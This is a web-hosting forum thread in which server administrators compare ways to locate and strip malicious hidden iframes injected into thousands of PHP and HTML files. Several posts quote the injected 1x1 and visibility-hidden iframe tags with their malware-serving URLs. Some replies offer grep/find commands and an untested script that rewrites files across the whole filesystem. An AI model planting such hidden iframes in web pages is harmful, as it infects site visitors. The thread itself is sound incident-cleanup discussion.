Need help removing tag from thousands of files

[ccccanada]

Hello!

Somehow on Aug 21 some hacker was able to compromise one of our servers and placed the following tag at the end of the page on tens of thousands of php and html documents both inside and outside of the /home directory.

<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

Since all the files that where affected where changed on the same day I was able with the following commands to get lists of affected documents on the server.

find / -perm 766 -exec ls -al {} \; | grep "Aug 21" > files766.txt

find / -perm 666 -exec ls -al {} \; | grep "Aug 21" > files666.txt

find / -perm 777 -exec ls -al {} \; | grep "Aug 21" > files777.txt

The above comand makes a text file with a list of all documents changed on that day and with certain permissions set and places in in the directory from where you ran the comand.

However now I am looking for help to find out if someone knows a command that will delete the line from all affected documents without me having to spend a month doing it manually.

If anyone can help it would be greatly appreciated.

Thanks
Harold

 

[Murtaza_t]

This will help you:

#!/bin/bash

find / -type f -name *.php -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' '' -- {} > /dev/null \;

echo "Removed Tag from PHP file"

find / -type f -name *.html -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>'  '' -- {} > /dev/null \;

echo "Removed Tag from HTML file"

find / -type f -name *.htm -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' '' -- {} > /dev/null \;

echo "Removed Tag from ALL files"

echo "Murtaza was here"

exit

It will remove tags from all .php .html .htm

NOTE: Please use it on your own risk.

 

[ccccanada]

Thank you very much i will give it a try now.

 

[wkdwich]

Have you found an effective means of keeping these ataccks from reoccuring??

This will help you:

#!/bin/bash

find / -type f -name *.php -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' '' -- {} > /dev/null \;

echo "Removed Tag from PHP file"

find / -type f -name *.html -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>'  '' -- {} > /dev/null \;

echo "Removed Tag from HTML file"

find / -type f -name *.htm -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' '' -- {} > /dev/null \;

echo "Removed Tag from ALL files"

echo "Murtaza was here"

exit

It will remove tags from all .php .html .htm

NOTE: Please use it on your own risk.

 

[nick1]

I've same issue and I see iframe codes as following in my lot of php and html files.

'<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>'

Can anyone please help me to tell how to remove them?

Thank you

 

[wkdwich]

I've same issue and I see iframe codes as following in my lot of php and html files.

'<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>'

Can anyone please help me to tell how to remove them?

Thank you

please see:
http://forums.cpanel.net/showpost.php?p=361256&postcount=157

 

[nick1]

Thank you but right now I need to know how could i remove these codes,

they are encypted format like

#&449;#456&;

when I post those codes here I saw it become as following

'<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>'


:s

 

[wkdwich]

Thank you but right now I need to know how could i remove these codes,

they are encypted format like

#&449;#456&;

when I post those codes here I saw it become as following

'<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>'


:s

depending on where the codes are:
regular html files
regular php files
inside a database

you can just upload your local versions to the site again and that should make things ok.. unless they are embedded in the database, then you may have to to to phpmyadmin and manully sreach and hand edit.. but as soon as you do that, stop your life and clean house.. local and remote

 

[nick1]

iframe codes are in php and html files not in database so I think if I know the script I could remove them.

The issue is I don't have the backup for those files currently

 

[wkdwich]

iframe codes are in php and html files not in database so I think if I know the script I could remove them.

The issue is I don't have the backup for those files currently

Then you will have to save them locally, clean and reupload, it might be faster than using the file manager tool in the cpanel admin

how many files are you talking about?? do you have root SSH access?

 

[nick1]

18 domains so you can imagine php and html files. Yes I've root access

 

[wkdwich]

18 domains so you can imagine php and html files. Yes I've root access

check this thread.. its a biggie

http://forums.cpanel.net/showpost.php?p=343535&postcount=422

thats the only one I can find now.. and all it does is tell you which files were injected, you still have to manually repair them

 

[nick1]

thanks, I'm afraid to modify search iframe string what should I mention there :s

 

[wkdwich]

thanks, I'm afraid to modify search iframe string what should I mention there :s

What I suggest is you use that tool (or the method I show below) to search the public_html directores of all the domains.. so if your server is set up like mine anything in
/home/

make a list of the files, then one by one.. sorry but if you have no local copies it has to be this way..

pico -w [filename]

you may or may not have pico.. you can use whatever editor you are familiar with.. but just delete anything from the < iframe > to and including the < /ifrmae > tag, save and close

You can try the method Murtaza_t suggested, but I have not tested that and I would not trust it personally..


the method I used:
I created a file on the server ftphack.txt that contained:
grep -l 'iframe' /home/*/public_html/*.htm
grep -l 'iframe' /home/*/public_html/*/*.htm
grep -l 'iframe' /home/*/public_html/*/*/*.htm
grep -l 'iframe' /home/*/public_html/*/*/*/*.htm
grep -l 'iframe' /home/*/public_html/*/*/*/*/*.htm
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*.htm
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*/*.htm
grep -l 'iframe' /home/*/public_html/*.php
grep -l 'iframe' /home/*/public_html/*/*.php
grep -l 'iframe' /home/*/public_html/*/*/*.php
grep -l 'iframe' /home/*/public_html/*/*/*/*.php
grep -l 'iframe' /home/*/public_html/*/*/*/*/*.php
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*.php
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*/*.php
grep -l 'iframe' /home/*/public_html/*.html
grep -l 'iframe' /home/*/public_html/*/*.html
grep -l 'iframe' /home/*/public_html/*/*/*.html
grep -l 'iframe' /home/*/public_html/*/*/*/*.html
grep -l 'iframe' /home/*/public_html/*/*/*/*/*.html
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*.html
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*/*.html


and I ran it from the command line with output.. now I could see every file that contained iframe in it and knew what I had to repair

your milage may vary and you may have to change the paths depending on your OS, but this worked very well for me.. and you need to hurry here.. the longer these files stay infeted the more ste visitors are getting infected the more this circle will continue to grow.. we have to stop this maddness!!

Last I suggest highly you get your PC looked at by a very qualified professional to make sure it is clean from any keyloggers or other critters.. install KeyScrambler on your local PC, change ALL the passwords on the server AFTER you have done all that locally.. if you have a keylogger on your PC you can change the passwords till you are purple.. they will keep tabs and stay updated.. If the keylogger on your system was the issue you shoud be good now.. if not you MUST contact your host people and ask them to thoroughly investigate if there are other domains on the server that were hit also to determine if it was a single issue or a server compromise.


oh and after all that is done, get everything copied locally.., you could have been done with this by now

Oh and if you do run any databases use phpmyadmin and search there for iframes to make sure its not in there too..

 

[brianoz]

A little more sophistication ...

find /home -name '*.php' -o -name '*.htm*' | xargs grep -l  iframe /dev/null

Works on infinite depth, and when /home is too big to expand '*'.

You can do a global replace if you use the exact string, with the replace command (think it's actually part of MySql):

replace old new -- filelist

You'd have to get the iframe code exact and this would only work if it is all on one line.

 

[nick1]

A little more sophistication ...

find /home -name '*.php' -o -name '*.htm*' | xargs grep -l  iframe /dev/null

Works on infinite depth, and when /home is too big to expand '*'.

You can do a global replace if you use the exact string, with the replace command (think it's actually part of MySql):

replace old new -- filelist

You'd have to get the iframe code exact and this would only work if it is all on one line.

very nice, thank you

 

[mesranet]

Hi,

Today one of my client effected with iframe to all .html file, the code as below:

<iframe src="http://peskostruikaz.com/?click=5364991" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="http://peskostruikaz.com/?click=537207C" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Is it any solution by using 'find' to remove all those thing and the problem is on 'click=537207C' is a running number

Please help